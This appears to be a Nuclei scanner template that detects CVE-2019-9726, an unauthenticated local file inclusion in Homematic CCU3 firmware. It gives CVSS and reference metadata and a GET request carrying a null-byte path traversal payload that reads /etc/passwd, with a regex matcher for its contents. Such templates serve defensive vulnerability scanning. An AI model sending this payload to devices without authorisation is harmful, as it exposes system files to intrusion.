id: CVE-2019-9726 info: name: Homematic CCU3 - Local File Inclusion author: 0x_Akoko severity: high description: eQ-3 AG Homematic CCU3 3.43.15 and earlier allows remote attackers to read arbitrary files of the device's filesystem, aka local file inclusion. This vulnerability can be exploited by unauthenticated attackers with access to the web interface. remediation: | Apply the latest security patches or updates provided by the vendor. reference: - https://atomic111.github.io/article/homematic-ccu3-fileread - https://nvd.nist.gov/vuln/detail/CVE-2019-9726 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2019-9726 cwe-id: CWE-22 epss-score: 0.02964 epss-percentile: 0.89769 cpe: cpe:2.3:o:eq-3:ccu3_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: eq-3 product: ccu3_firmware tags: cve,cve2019,homematic,lfi http: - method: GET path: - "{{BaseURL}}/.%00./.%00./etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - "bin:.*:0:0:" condition: or - type: status status: - 200 # digest: 490a004630440220279be9a45cb6f4536d10a6cdfa5a6932536b77d670a1a8ca79b25b30b556881e022025d252ad14068e4b78e784bbcc4c403e9ab4a651924daa33b0c72604a6b9ebb7:922c64590222798bb761d5b6d8e72950